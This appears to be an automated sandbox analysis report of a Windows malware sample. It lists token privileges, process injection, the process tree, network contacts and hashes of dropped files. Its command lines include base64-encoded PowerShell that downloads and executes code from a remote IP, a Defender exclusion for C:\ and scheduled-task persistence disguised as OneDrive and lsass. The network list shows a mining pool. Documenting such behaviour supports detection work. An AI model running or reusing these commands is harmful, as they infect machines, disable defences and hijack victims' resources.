Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5028 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5028 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5028 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5028 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5028 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5028 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5028 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5028 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3976 wrote to memory of 3460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3976 wrote to memory of 3460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3976 wrote to memory of 3460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3976 wrote to memory of 3460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3976 wrote to memory of 3460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3976 wrote to memory of 3460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3976 wrote to memory of 3460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3976 wrote to memory of 3460 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2776 wrote to memory of 3916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2776 wrote to memory of 3916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2776 wrote to memory of 3916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2776 wrote to memory of 3916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2776 wrote to memory of 3916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2776 wrote to memory of 3916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2776 wrote to memory of 3916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2776 wrote to memory of 3916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2808 wrote to memory of 4560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 2808 wrote to memory of 4560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1472 wrote to memory of 1816 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1472 wrote to memory of 1816 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1472 wrote to memory of 2096 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1472 wrote to memory of 2096 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1472 wrote to memory of 3228 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1472 wrote to memory of 3228 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1472 wrote to memory of 2744 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1472 wrote to memory of 2744 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2808 wrote to memory of 4352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2808 wrote to memory of 4352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2808 wrote to memory of 4352 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2440 wrote to memory of 3452 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2440 wrote to memory of 3452 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2440 wrote to memory of 868 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2440 wrote to memory of 868 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2808 wrote to memory of 228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2808 wrote to memory of 228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2808 wrote to memory of 228 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2440 wrote to memory of 2276 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2440 wrote to memory of 2276 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2440 wrote to memory of 5112 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2440 wrote to memory of 5112 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 228 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 228 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 228 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 228 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 228 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 228 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 228 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 484 wrote to memory of 4740 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 2540 wrote to memory of 3728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2540 wrote to memory of 3728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2540 wrote to memory of 3728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 484 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 11:13 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp12AD.tmp.bat""

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 23.41.204.62.in-addr.arpa udp
US 8.8.8.8:53 123.108.74.40.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
N/A 185.161.248.16:26885 tcp
US 8.8.8.8:53 16.248.161.185.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.45:80 pool.hashvault.pro tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 45.242.202.142.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 20.189.173.12:443 tcp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 2.77.109.52.in-addr.arpa udp
NL 8.238.20.126:80 tcp
US 93.184.220.29:80 tcp
NL 8.238.20.126:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 131.253.33.203:80 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp

Files

memory/5028-133-0x0000000000EB0000-0x0000000000ECC000-memory.dmp

memory/5028-135-0x000000001CFC0000-0x000000001D10E000-memory.dmp

memory/2464-136-0x00000178DD6E0000-0x00000178DD6F0000-memory.dmp

memory/2464-151-0x00000178DD680000-0x00000178DD6A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3mkumgzq.jhg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3976-174-0x00000152EE560000-0x00000152EE570000-memory.dmp

memory/3976-175-0x00000152EE560000-0x00000152EE570000-memory.dmp

memory/2464-176-0x00000178DD6E0000-0x00000178DD6F0000-memory.dmp

memory/2808-178-0x000002016F170000-0x000002016F180000-memory.dmp

memory/3976-179-0x00000152EE560000-0x00000152EE570000-memory.dmp

memory/2776-177-0x0000029C86910000-0x0000029C86920000-memory.dmp

memory/2808-180-0x000002016F170000-0x000002016F180000-memory.dmp

memory/2464-181-0x00000178DD6E0000-0x00000178DD6F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 026d93a446c50e4ae9aa47a15d0e923f
SHA1 f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256 c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512 009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181

memory/3460-184-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/3460-189-0x0000000002FA0000-0x0000000003006000-memory.dmp

memory/3460-190-0x0000000005660000-0x00000000056FC000-memory.dmp

memory/3460-191-0x0000000005700000-0x0000000005766000-memory.dmp

memory/3460-192-0x0000000005AC0000-0x0000000005AD0000-memory.dmp

memory/3916-194-0x0000000000400000-0x0000000000430000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9984f1faa8354cf501562ef615fa84e4
SHA1 bd4771b04a00c7c89476b006dca120beb22a2b0a
SHA256 7a8e40b84798dba3948e771c5af62f7e5ca0e3d3a263784c344fd33cb4037ddf
SHA512 27a0510c5bec92da20fb689aac412ea1758f5c1847776095fd7d232513099212727e22795afd6b5b05fc184e2ae2e1cd9349e52e2f43decd07d6b37fa90c02de

memory/3916-197-0x00000000058E0000-0x0000000005EF8000-memory.dmp

memory/3916-198-0x00000000053F0000-0x00000000054FA000-memory.dmp

memory/3916-199-0x0000000005320000-0x0000000005332000-memory.dmp

memory/3916-200-0x0000000005380000-0x00000000053BC000-memory.dmp

memory/3916-201-0x0000000005170000-0x0000000005180000-memory.dmp

memory/2808-202-0x000002016F170000-0x000002016F180000-memory.dmp

memory/2808-204-0x000002016F170000-0x000002016F180000-memory.dmp

memory/2808-205-0x000002016F170000-0x000002016F180000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/3460-210-0x0000000005AC0000-0x0000000005AD0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/3916-213-0x0000000005690000-0x0000000005706000-memory.dmp

memory/3916-214-0x00000000057B0000-0x0000000005842000-memory.dmp

memory/3916-215-0x00000000069A0000-0x0000000006F44000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9984f1faa8354cf501562ef615fa84e4
SHA1 bd4771b04a00c7c89476b006dca120beb22a2b0a
SHA256 7a8e40b84798dba3948e771c5af62f7e5ca0e3d3a263784c344fd33cb4037ddf
SHA512 27a0510c5bec92da20fb689aac412ea1758f5c1847776095fd7d232513099212727e22795afd6b5b05fc184e2ae2e1cd9349e52e2f43decd07d6b37fa90c02de

memory/1452-228-0x000001399CA50000-0x000001399CA60000-memory.dmp

memory/1452-229-0x000001399CA50000-0x000001399CA60000-memory.dmp

memory/3916-230-0x00000000066C0000-0x0000000006882000-memory.dmp

memory/3916-231-0x0000000008B70000-0x000000000909C000-memory.dmp

memory/1452-232-0x000001399CA50000-0x000001399CA60000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/4560-236-0x00007FF7181D0000-0x00007FF718B9A000-memory.dmp

memory/3916-237-0x0000000005170000-0x0000000005180000-memory.dmp

memory/3916-238-0x0000000006670000-0x00000000066C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

memory/4352-245-0x0000000000400000-0x000000000083B000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/4352-257-0x0000000004900000-0x0000000004901000-memory.dmp

memory/4352-258-0x00000000048E0000-0x00000000048E1000-memory.dmp

memory/4352-259-0x00000000048F0000-0x00000000048F1000-memory.dmp

memory/228-260-0x0000000000780000-0x0000000000BA0000-memory.dmp

memory/1060-261-0x000002922B700000-0x000002922B710000-memory.dmp

